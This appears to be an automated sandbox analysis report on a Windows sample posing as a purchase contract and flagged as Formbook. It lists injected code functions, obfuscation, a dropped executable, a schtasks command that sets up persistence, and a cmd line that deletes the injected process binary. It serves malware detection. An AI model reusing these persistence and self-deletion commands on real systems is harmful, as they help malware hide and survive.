Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B39A80 NtOpenDirectoryObject, 9_2_04B39A80
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B39A20 NtResumeThread, 9_2_04B39A20
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B39A10 NtQuerySection, 9_2_04B39A10
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B39A00 NtProtectVirtualMemory, 9_2_04B39A00
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B3A3B0 NtGetContextThread, 9_2_04B3A3B0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B39B00 NtSetValueKey, 9_2_04B39B00
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_02EB82F0 NtClose, 9_2_02EB82F0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_02EB8270 NtReadFile, 9_2_02EB8270
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_02EB83A0 NtAllocateVirtualMemory, 9_2_02EB83A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_02EB81C0 NtCreateFile, 9_2_02EB81C0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_02EB82EA NtClose, 9_2_02EB82EA
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_02EB826C NtReadFile, 9_2_02EB826C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_02EB8215 NtCreateFile, 9_2_02EB8215
Detected potential crypto function
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Code function: 1_2_0010B673 1_2_0010B673
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Code function: 1_2_00BDC27C 1_2_00BDC27C
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Code function: 1_2_00BDEC58 1_2_00BDEC58
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Code function: 1_2_00BDEC48 1_2_00BDEC48
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Code function: 1_2_046604F8 1_2_046604F8
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Code function: 1_2_046631C9 1_2_046631C9
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Code function: 1_2_04660B48 1_2_04660B48
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Code function: 1_2_046604E8 1_2_046604E8
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Code function: 1_2_04661600 1_2_04661600
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Code function: 1_2_04661C05 1_2_04661C05
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Code function: 1_2_04660EF1 1_2_04660EF1
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Code function: 1_2_04660F00 1_2_04660F00
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Code function: 1_2_046619F1 1_2_046619F1
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Code function: 1_2_04660B39 1_2_04660B39
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Code function: 1_2_04661BAF 1_2_04661BAF
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Code function: 1_2_0010B6C0 1_2_0010B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00401030 4_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0041B909 4_2_0041B909
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00408C60 4_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00408C64 4_2_00408C64
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00402D88 4_2_00402D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00402D90 4_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0041CE65 4_2_0041CE65
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00402FB0 4_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015AF900 4_2_015AF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015C4120 4_2_015C4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0167E824 4_2_0167E824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01661002 4_2_01661002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_016728EC 4_2_016728EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015BB090 4_2_015BB090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_016720A8 4_2_016720A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D20A0 4_2_015D20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015CAB40 4_2_015CAB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01672B28 4_2_01672B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0166DBD2 4_2_0166DBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_016603DA 4_2_016603DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015DEBB0 4_2_015DEBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0165FA2B 4_2_0165FA2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_016722AE 4_2_016722AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01671D55 4_2_01671D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01672D07 4_2_01672D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A0D20 4_2_015A0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_016725DD 4_2_016725DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015BD5E0 4_2_015BD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D2581 4_2_015D2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0166D466 4_2_0166D466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015B841F 4_2_015B841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01671FF1 4_2_01671FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0167DFCE 4_2_0167DFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015C6E30 4_2_015C6E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0166D616 4_2_0166D616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01672EF7 4_2_01672EF7
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB4496 9_2_04BB4496
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B0841F 9_2_04B0841F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BBD466 9_2_04BBD466
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B22581 9_2_04B22581
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB2D82 9_2_04BB2D82
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B0D5E0 9_2_04B0D5E0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BC25DD 9_2_04BC25DD
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04AF0D20 9_2_04AF0D20
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BC2D07 9_2_04BC2D07
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BC1D55 9_2_04BC1D55
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BC2EF7 9_2_04BC2EF7
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B16E30 9_2_04B16E30
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BBD616 9_2_04BBD616
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BC1FF1 9_2_04BC1FF1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BCDFCE 9_2_04BCDFCE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B220A0 9_2_04B220A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BC20A8 9_2_04BC20A8
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B0B090 9_2_04B0B090
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BC28EC 9_2_04BC28EC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B1A830 9_2_04B1A830
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BCE824 9_2_04BCE824
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB1002 9_2_04BB1002
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B199BF 9_2_04B199BF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B14120 9_2_04B14120
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04AFF900 9_2_04AFF900
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BC22AE 9_2_04BC22AE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB4AEF 9_2_04BB4AEF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BAFA2B 9_2_04BAFA2B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2EBB0 9_2_04B2EBB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BA23E3 9_2_04BA23E3
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB03DA 9_2_04BB03DA
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BBDBD2 9_2_04BBDBD2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2ABD8 9_2_04B2ABD8
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BC2B28 9_2_04BC2B28
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B1A309 9_2_04B1A309
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B1AB40 9_2_04B1AB40
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_02EA2FB0 9_2_02EA2FB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_02EA8C60 9_2_02EA8C60
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_02EA8C64 9_2_02EA8C64
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_02EA2D88 9_2_02EA2D88
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_02EA2D90 9_2_02EA2D90
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 04AFB150 appears 133 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 015AB150 appears 48 times
PE file contains strange resources
Source: Purchase contract #9009.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: nzRFOjxWpomfsw.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: Purchase contract #9009.exe, 00000001.00000000.635312674.0000000000214000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameSTATS.exe2 vs Purchase contract #9009.exe
Source: Purchase contract #9009.exe, 00000001.00000002.674138068.00000000055C0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameConfigNodeType.dll> vs Purchase contract #9009.exe
Source: Purchase contract #9009.exe, 00000001.00000002.677412365.000000000DC60000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs Purchase contract #9009.exe
Source: Purchase contract #9009.exe, 00000001.00000002.671070380.0000000003D1A000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameStoreElement.dllB vs Purchase contract #9009.exe
Source: Purchase contract #9009.exe, 00000001.00000002.677873822.000000000DD50000.00000002.00000001.sdmp Binary or memory string: originalfilename vs Purchase contract #9009.exe
Source: Purchase contract #9009.exe, 00000001.00000002.677873822.000000000DD50000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Purchase contract #9009.exe
Source: Purchase contract #9009.exe Binary or memory string: OriginalFilenameSTATS.exe2 vs Purchase contract #9009.exe
Uses 32bit PE files
Source: Purchase contract #9009.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp Binary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
Source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp Binary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
Source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
Source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
Source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp Binary or memory string: *.sln
Source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp Binary or memory string: MSBuild MyApp.csproj /t:Clean
Source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp Binary or memory string: /ignoreprojectextensions:.sln
Source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp Binary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
Source: classification engine Classification label: mal100.troj.evad.winEXE@10/4@11/8
Source: C:\Users\user\Desktop\Purchase contract #9009.exe File created: C:\Users\user\AppData\Roaming\nzRFOjxWpomfsw.exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_01
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Mutant created: \Sessions\1\BaseNamedObjects\lSWDNesHjauOn
Source: C:\Users\user\Desktop\Purchase contract #9009.exe File created: C:\Users\user\AppData\Local\Temp\tmpC4FD.tmp
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: Purchase contract #9009.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\Purchase contract #9009.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Purchase contract #9009.exe Virustotal: Detection: 25%
Source: Purchase contract #9009.exe ReversingLabs: Detection: 36%
Source: C:\Users\user\Desktop\Purchase contract #9009.exe File read: C:\Users\user\Desktop\Purchase contract #9009.exe
Source: unknown Process created: C:\Users\user\Desktop\Purchase contract #9009.exe 'C:\Users\user\Desktop\Purchase contract #9009.exe'
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\nzRFOjxWpomfsw' /XML 'C:\Users\user\AppData\Local\Temp\tmpC4FD.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\Purchase contract #9009.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Purchase contract #9009.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Purchase contract #9009.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Purchase contract #9009.exe Static file information: File size 1374720 > 1048576
Source: Purchase contract #9009.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x110400
Source: Purchase contract #9009.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: explorer.pdbUGP source: MSBuild.exe, 00000004.00000002.717925108.0000000003200000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.677675912.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000004.00000002.717581490.000000000169F000.00000040.00000001.sdmp, explorer.exe, 00000009.00000002.905256355.0000000004BEF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: MSBuild.exe, explorer.exe
Source: Binary string: explorer.pdb source: MSBuild.exe, 00000004.00000002.717925108.0000000003200000.00000040.00000001.sdmp
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.677675912.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Code function: 1_2_0010C836 push es; retf 1_2_0010C973
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Code function: 1_2_0010C9C6 push es; ret 1_2_0010CB53
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Code function: 1_2_0010B673 push es; iretd 1_2_0010C833
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Code function: 1_2_0010B673 push es; retf 1_2_0010C973
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Code function: 1_2_0010B673 push es; retf 0001h 1_2_0010C9C3
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Code function: 1_2_0010C976 push es; retf 0001h 1_2_0010C9C3
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Code function: 1_2_0010C976 push es; ret 1_2_0010CB53
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Code function: 1_2_0010C976 push es; retn 0001h 1_2_0010CBA3
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Code function: 1_2_0010B6C0 push es; iretd 1_2_0010C833
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_004150FC push ss; iretd 4_2_00415117
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0041B3B5 push eax; ret 4_2_0041B408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0041B46C push eax; ret 4_2_0041B472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0041B402 push eax; ret 4_2_0041B408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0041B40B push eax; ret 4_2_0041B472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0041C57F push dword ptr [7A69614Dh]; ret 4_2_0041C5A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0041B6CC push 24CBA43Eh; ret 4_2_0041B6FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015FD0D1 push ecx; ret 4_2_015FD0E4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B4D0D1 push ecx; ret 9_2_04B4D0E4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_02EBBA3A push es; iretd 9_2_02EBBA3B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_02EBB3B5 push eax; ret 9_2_02EBB408
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_02EB50FC push ss; iretd 9_2_02EB5117
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_02EBB9C3 push eax; retf 9_2_02EBB9C4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_02EBBEFB pushad ; iretd 9_2_02EBBEFF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_02EBB6CC push 24CBA43Eh; ret 9_2_02EBB6FD
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_02EBB46C push eax; ret 9_2_02EBB472
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_02EBB40B push eax; ret 9_2_02EBB472
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_02EBB402 push eax; ret 9_2_02EBB408
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_02EBC57F push dword ptr [7A69614Dh]; ret 9_2_02EBC5A0
Source: initial sample Static PE information: section name: .text entropy: 6.97011388032

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\Purchase contract #9009.exe File created: C:\Users\user\AppData\Roaming\nzRFOjxWpomfsw.exe

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\nzRFOjxWpomfsw' /XML 'C:\Users\user\AppData\Local\Temp\tmpC4FD.tmp'
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmp, type: MEMORY
